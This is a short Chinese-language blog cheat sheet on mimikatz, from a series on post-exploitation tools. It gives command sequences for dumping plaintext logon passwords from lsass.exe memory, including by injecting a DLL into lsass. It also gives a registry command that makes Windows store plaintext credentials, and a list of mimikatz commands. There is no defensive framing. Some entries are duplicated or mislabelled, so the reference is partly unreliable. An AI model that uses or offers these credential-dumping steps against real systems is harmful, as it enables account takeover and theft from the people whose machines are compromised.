SecTools-mimikatz


后渗透工具系列

  • mimikatz —// 下载地址 跃迁s

Ax_Introduciton

mimikatz是一款功能强大的轻量级调试神器,经过它你能够提高进程权限注入进程读取进程内存,获取到内存文件 lsass.exe 进程 (它用于本地安全和登陆策略) 中存储的明文登录密码。该工具已经集成在MSF中。

Bx_Commom_GetPassword

use administrator open

M1 only version2.0

a up

privilege::debug

b catch

sekurlsa::logonpasswords

M2 inject process

a up

privilege::debug

b inject

inject::process lsass.exe sekurlsa.dll

c catch

@getLogonPasswords

因为win10不能保存明文密码,可以通过修改注册表来实现保存明文密码。修改后重启。

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

Cx_Common Command

version查看mimikatz的版本
system::user查看当前登录的系统用户
system::computer查看计算机名称
process::list列出进程
process::suspend进程名称暂停进程
process::stop进程名称结束进程
process::modules列出系统的核心模块及所在位置
service::list列出系统的服务
service::remove移除系统的服
service::remove移除系统的服务
service::startstop服务名称启动或停止服务
privilege::list列出权限列表
privilege::enable**一个或多个权限
privilege::debug提升权限
nogpo::cmd打开系统的cmd.exe
nogpo::regedit打开系统的注册表
nogpo::taskmgr打开任务管理器
ts::sessions显示当前的会话
ts::processes显示进程和对应的pid情况等
sekurlsa::wdigest获取本地用户信息及密码
sekurlsa::wdigest获取kerberos用户信息及密码
sekurlsa::tspkg获取tspkg用户信息及密码
sekurlsa::logonpasswords获登陆用户信息及密码

Dx_References

[1] https://www.cnblogs.com/-mo-/p/11890232.html


文章作者: Enomothem
版权声明: 本博客所有文章除特别声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 Enomothem !
  目录